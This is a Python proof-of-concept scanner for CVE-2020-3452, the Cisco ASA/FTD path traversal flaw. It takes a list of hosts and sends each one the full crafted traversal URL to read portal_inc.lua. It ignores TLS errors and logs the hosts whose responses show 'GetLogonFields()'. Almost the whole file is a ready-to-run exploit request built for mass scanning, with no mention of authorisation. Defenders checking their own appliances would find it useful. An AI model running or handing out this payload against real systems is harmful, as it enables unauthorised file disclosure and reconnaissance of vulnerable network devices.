CVE-2020-3452.py

# Check, if IP address or domain is vulnerable to CVE-2020-3452 (Cisco 
# Adaptive Security Appliance and Firepower Threat Defense Path 
# Traversal Vulnerability) through loading portal_inc.lua via crafted 
# html request
# 
# by @foulenzer

# import stuff
import requests
import warnings
import sys

# ignore openSSL warnings
warnings.filterwarnings("ignore")

# prepare stuff
count = 0
subject_list = open(sys.argv[1], 'r').readlines()
output_list  = open(sys.argv[2], "a")
output_list.write('### CVE-2020-3452 PoC ###')

# Looks beatiful, no?
print('### CVE-2020-3452 PoC ###')
print('# Checking subject_list #')

# Iterate through 
for subject in subject_list:
    try:
        x = requests.get('https://'+subject+'/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua', timeout=20, verify=False)
    except:
        try:
            x = requests.get('http://'+subject+'/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua', timeout=20, verify=False)
        except:
            # do nothing
            pass
        else:
            if 'GetLogonFields()' in x.text:
                print('found: '+subject)
                output_list.write(subject)
                count += 1

    else:
        if 'GetLogonFields()' in x.text:
            print('found: '+subject)
            output_list.write(subject)
            count += 1

print(str(count)+' vulnerable subjects found!')